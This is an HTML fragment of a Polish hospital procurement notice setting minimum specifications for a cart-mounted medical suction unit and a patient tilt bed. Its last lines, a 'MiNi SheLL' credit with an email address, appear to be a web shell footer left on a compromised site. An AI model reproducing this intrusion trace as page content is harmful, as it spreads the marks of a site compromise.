<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Elektryczny ssak medyczny na wózku jezdnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalne parametry techniczne urządzenia oraz wymagania:

- minimalne wymagania: sterowanie z pulpitu oraz wyłącznikiem nożnym z możliwością pracy w trybie przerywanym
- zabezpieczenie przed przelaniem - naczynie kontrolne min. 0,8 l z zaworem, zawór odcinający w pokrywie butli przelewowej z możliwością wyposażenia maszyny w poliwęglanowe naczynia wielorazowego użytku o pojemności 2 l z zaworem zabezpieczającym i filtrem, filtry na wejściu i wyjściu z wymiennymi wkładami,
urządzenie musi być wyposażone w dwie min. 2,5 l szklane butle wielorazowego użytku.
do zestawu musi być dołączony przewód ssący silikonowy  7 1,5 m oraz zapasowe filtry antybakteryjne 1op/20 szt.
umieszczony na dużym wózku posiadającym 4 kółka
szybkość zasysania powietrza min. 29 l/min
zakres regulacji podciśnienia do -0,085 MPa
klasa izolacji 1, głośność poniżej 50 dB
minimalny okres gwarancji: 2 lata
wymiary +-10% od standardowych 260 x 360 x 350 mm

Ssak medyczny musi być fabrycznie nowy (rok produkcji: 2013 lub 2012), kompletny i po zainstalowaniu gotowy do użycia bez żadnych dodatkowych zakupów i inwestycji. Cena zawiera koszty dostawy i instalacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Łóżko do pionizacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalne parametry techniczne urządzenia oraz wymagania:
regulacja kąta pochylenia za pomocą siłownika elektrycznego (pilotem ręcznym)
wyposażone w blat tapicerowany, na którym mocowane są pasy do stabilizacji kolan, miednicy i klatki piersiowej, pufki boczne podtrzymujące głowę.
W części dolnej łóżko wyposażone w podnóżek i pasy do unieruchomienia stawów skokowych kończyn dolnych
łóżko wyposażone w koła antystatyczne z blokadą, łóżko na kółkach umożliwiające przemieszczanie
obciążenie minimalne: 170 kg
barierki boczne z możliwością podnoszenia i opuszczania
regulacja oparcia pleców min 0 - 70 stopni
regulacja podparcia kończyn dolnych
regulacja wysokości leża (pozioma) - 400-800 mm (+-50 mm)
wymiary długość stołu - 1950 -2150 mm, szerokość stołu 650mm - 1020 mm, 
minimalny okres gwarancji: 24 miesiące

Łóżko do pionizacji musi być fabrycznie nowe (rok produkcji: 2013 lub 2012), kompletne i po zainstalowaniu gotowe do użycia bez żadnych dodatkowych zakupów i inwestycji. Cena zawiera koszty dostawy i instalacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com